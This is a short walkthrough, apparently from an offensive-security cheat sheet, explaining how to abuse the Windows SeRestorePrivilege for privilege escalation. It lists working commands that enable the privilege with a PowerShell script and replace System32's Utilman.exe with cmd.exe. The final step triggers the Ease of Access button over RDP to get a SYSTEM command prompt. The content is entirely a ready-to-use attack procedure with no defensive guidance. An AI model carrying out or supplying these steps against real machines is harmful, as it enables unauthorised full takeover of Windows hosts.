SeRestorePrivilege

When an account holds SeRestorePrivilege, it can be leveraged for privilege escalation: the privilege causes the system to grant write access to any file regardless of its ACL, so protected system binaries can be renamed or overwritten. The privilege is normally present in the token but disabled, so it must be enabled in the process token before it has any effect.

  1. Obtain the required script

Download the EnableSeRestorePrivilege.ps1 script, which enables the privilege in the current PowerShell session (it flips SeRestorePrivilege from Disabled to Enabled in the process token).

  2. Enable the privilege and replace Utilman

Execute the script, then abuse the privilege from the same session to swap Utilman.exe for cmd.exe:

.\EnableSeRestorePrivilege.ps1
ren C:\Windows\System32\Utilman.exe C:\Windows\System32\Utilman.pwned
ren C:\Windows\System32\cmd.exe C:\Windows\System32\utilman.exe

This works because SeRestorePrivilege lets the caller bypass file permissions when writing to (or renaming files in) system locations such as System32, which is otherwise owned by TrustedInstaller and not writable by ordinary users. The enabled state lives in the token of the PowerShell process that ran the script, so the renames must be issued from that session (or a process it spawned). Note that the second rename removes cmd.exe from its original path; rename both files back once you have your shell, otherwise cmd.exe stays missing.

  3. Connect via RDP

From a Linux machine, connect to the target using RDP:

rdesktop <target IP>

  4. Trigger SYSTEM shell

On the login screen, click the Ease of Access button. Winlogon launches Utilman.exe in the SYSTEM context, and since Utilman.exe is now cmd.exe, this opens a command prompt running as SYSTEM.
